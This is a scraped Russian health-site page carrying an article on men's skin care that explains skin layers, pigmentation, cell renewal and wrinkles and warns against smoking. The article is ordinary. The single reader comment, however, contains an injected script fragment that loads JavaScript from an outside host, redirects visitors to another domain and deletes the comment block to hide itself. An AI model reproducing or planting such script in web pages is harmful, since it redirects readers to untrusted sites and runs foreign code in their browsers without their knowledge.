Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Всей кожей  >>  Всей кожей
 
Обратная связь
 

Всей кожей

Размер шрифта
23 мая 2011 00:00
  • google_analytics: false
  • Нравится

Слава Богу, кануло в небытие и стало мифом мнение, что настоящий мужчина «могуч, волосат, шершав и пахуч». Могуч – возможно, волосат – на ваше усмотрение, но вот со всем остальным не согласятся даже убежденные консерваторы. Скорее – все-таки гладок и ароматен, под стать своей ухоженной подруге. Потому хочешь-не хочешь, приходится смотреться в зеркало и думать, чем бы таким помазать после бритья, чтобы щека стала глаже и ароматнее?

уход за кожей для мужчин

Елена Перова / «Здоровье-инфо»

Нет ничего проще. Сегодня существует великое множество средств по уходу за кожей, разработанных специально для мужчин. Все они составлялись с учетом особенностей мужской кожи и ее отличий от женской. Давайте только вначале вспомним, дорогие мужчины, что такое человеческая кожа вообще и кожа мужчины – в частности.

Ближе к телу

Итак, кожа – важнейший комплексный орган человека, кроме того – и самый крупный. Площадь кожного покрова мужчины составляет около 2 м². Этот орган отвечает за безопасность своего хозяина. Именно кожа первая испытывает все внешние воздействия, будь то физические поражения или вредоносные бактерии и химические элементы. Кожа – несколько слоев клеток различного типа, нервных окончаний, желез и 16% от общей массы человеческого тела.

В три слоя

Кожа состоит из трех основных слоев – эпидермиса, дермы и подкожно-жировой клетчатки. Эпидермис – самый верхний, внешний слой кожи – это персональная оболочка, «упаковка» организма, тот самый барьер, который защищает от вторжения вредоносных агентов. Именно этот слой кожи обрабатывают при нарушении его целостности (в случае механического повреждения), иначе через некоторое время возникнет прямой риск инфицирования, нагноений и заражений.

Телесного цвета

Цвет кожи многое расскажет о ее хозяине. Отчего же он зависит? В эпидермисе вырабатывается пигмент меланин, который и определяет цвет кожи, а главное – защищает кожу от воздействия ультрафиолетовых лучей. Чем больше меланина вырабатывается, тем человек смуглее. Однако количество вырабатываемых меланоцитов (пигментные клетки, синтезирующие меланин) само по себе не определяет цвет кожи отдельного человека или представителя определенной расы. Скорее, наоборот, расовая принадлежность определяет тип и количество продуцируемого меланина. Так, например, в коже представителей азиатской расы содержится больше каротина, который придает коже желтоватый оттенок.

уход за кожей для мужчин

Как мы сбрасываем кожу

В эпидермисе постоянно идет процесс обновления клеток. В более глубоком его слое происходит клеточное деление, молодые клетки поднимаются на поверхность эпидермиса, где занимают место старых, отмерших клеток, которые отшелушиваются. Таким образом, каждую минуту мы теряем приблизительно 30000 отмерших клеток кожи. Мы этого практически не замечаем, а между тем весь процесс обновления клеток эпидермиса длится примерно 3-4 недели, так что можно сказать, что мы «сбрасываем кожу» каждый месяц.

Время от времени от отмерших клеток можно избавляться чисто механическим путем, используя специальные средства и таким образом обновлять свою кожу, к примеру, с помощью глубоко отшелушивающего геля.

Откуда берутся морщины

Под эпидермисом находится дерма, этот слой в четыре раза толще эпидермиса. Именно здесь расположены потовые и сальные железы, то есть именно дерма отвечает за увлажнение. Таким образом, по всем вопросам, связанным с морщинами, обращайтесь к ней. Через мельчайшие поры дермы сало и пот выводятся на поверхность эпидермиса. Белки коллагена и эластина также синтезируются в дерме. Они обеспечивают эластичность и упругость кожи, а также заботятся о поддержании уровня влаги. С возрастом синтез этих белков существенно замедляется, кожа становится сухой, истончается, делается более «хрупкой».

В дерме также находятся система мельчайших кровеносных сосудов и нервных окончаний. Собственно в эпидермисе капилляров нет, так что функцию снабжения кожи питательными веществами и кислородом выполняет дерма, как и функцию терморегуляции. А благодаря нервным окончаниям мы испытываем тактильные ощущения, то есть «кожей чувствуем». Нервные окончания распределены неравномерно, поэтому наиболее чувствительные участки нашего тела – это руки, лицо и область гениталий.

В дерме же располагаются волосяные фолликулы – крошечные мешочки, из которых растут волосы. По существу, волосяного покрова лишены на теле человека только ладони, ступни и губы. Ученые связывают это как раз с тем, что наличие волос в этих областях снизило бы четкость тактильных ощущений.

Под кожей

Наконец, третий слой кожи, находящийся под дермой – это подкожная жировая клетчатка. Она бывает разной толщины, но у женщин – потолще, чем у мужчин. Подкожная жировая клетчатка выполняет роль «термопрослойки» организма, а еще – защищает его от повреждений в результате различных механических воздействий – ударов, например.

Где мы, толстокожие?

Кожа на спине и ступнях у человека самая толстая, а кожа век – самая тоненькая. К «толстокожим» областям также относятся ладони и пятки, а к «тонкокожим» участкам – уши, нос и губы.

Позаботьтесь о своей внешности

Что же нужно сделать, чтобы сохранить здоровый внешний вид? Прежде всего, в один голос говорят врачи, – не курить! Так что за свою кожу с ранними морщинами, оттенком и фактурой, напоминающей чернослив, скажите «спасибо» этой привычке. Бросайте курить, это полезно и совершенно бесплатно. Среди других средств защиты кожи от старения на первом месте летом стоит солнцезащитный крем с цинком, который защищает от фотостарения и образования морщин. Препарат содержит защиту от UV.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:12

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Необычные факторы риска рака кожи   Бархатный сезон   Курение: сексуально или нет?   Раздражение после бритья: предотвращаем и лечим  
25 июня 2013Компании, производящие краски для волос, разоряются! Изобретено лекарство против седины 14 июня 2013Рыжий, рыжий, конопатый... А теперь еще и с раком! Ген рыжих волос приводит к раку кожи! Как защититься
 
13 июня 2013Перец, как и сигареты, спасает от Паркинсона! 04 июня 2013У вас лысый муж? Он может умереть от инфаркта
 

Слайдшоу

1
Самые стыдные вопросы о красоте. Часть 2
Почему ваше тело делает то, что оно делает
Какие привычки портят вам жизнь?

Тесты

1
Как устроены волосы человека?
Профессиональный оценщик кожи
Есть ли у вас остеопороз?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.